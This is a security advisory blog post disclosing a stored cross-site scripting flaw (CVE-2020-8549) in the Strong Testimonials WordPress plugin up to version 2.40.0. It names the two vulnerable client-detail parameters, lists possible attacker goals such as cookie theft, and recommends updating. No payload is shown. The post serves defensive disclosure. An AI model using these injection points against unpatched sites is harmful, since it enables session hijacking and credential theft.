Plugin Exploit

Stored XSS Vulnerability found in Strong Testimonials Plugin <= 2.40.0 - Update immediately

Updated on: March 29, 2020

Stored XSS Vulnerability found in Strong Testimonials Plugin <= 2.40.0 - Update immediately

On testing the popular WordPress testimonials plugin, Strong Testimonials, I found multiple stored XSS vulnerabilities in the plugin. All WordPress websites using Strong Testimonials version 2.40.0 and below are affected.

CVE ID: CVE-2020-8549
CWE ID: CWE-79

Summary

Strong Testimonials is a popular and easily customizable WordPress testimonial plugin with over 90,000 active installations. The stored XSS vulnerabilities found in the plugin can be exploited by attackers to perform malicious actions such as stealing the victim’s session cookies or login credentials, performing arbitrary actions such as logging on the victim’s behalf, introducing their keystrokes, infecting your website with Japanese keyword hack, and more.

Vulnerability

In the client details section which is seen when adding or editing a testimonial, the custom[client_name] and custom[company_name] parameters were found to be vulnerable to stored cross-site scripting.

When the testimonial is added to a page on the site, the XSS payload passed in both of the above mentioned vulnerable parameters get executed.

The payload in custom[client_name] also gets executed in the All Testimonials (/wp-admin/edit.php?post_type=wpm-testimonial) page.

Timeline

Vulnerability reported to the Strong Testimonials team on January 23, 2020.
Strong Testimonials version 2.40.1 containing the fix to the vulnerability was released on January 25, 2020.

Recommendation

It is highly recommended to update the plugin to the latest version.

Reference

For best security practices, you can follow the below guides:

Was this post helpful?

Tags: , , , , , , ,

Jinson Varghese

Jinson Varghese Behanan is an Information Security Analyst at Astra. Passionate about Cybersecurity from a young age, Jinson completed his Bachelor's degree in Computer Security from Northumbria University. When he isn’t glued to a computer screen, he spends his time reading InfoSec materials, playing basketball, learning French and traveling.You can follow him on Medium or visit his Website for more stories about the various Security Audits he does and the crazy vulnerabilities he finds.
guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

0 Comments
Inline Feedbacks
View all comments

Psst! Hi there. We’re Astra.

We make security simple and hassle-free for thousands
of websites and businesses worldwide.

Our suite of security products include firewall, malware scanner and security audits to protect your site from the
evil forces on the internet, even when you sleep.

earth spiders cards bugs spiders

Made with ❤️ in USA France India Germany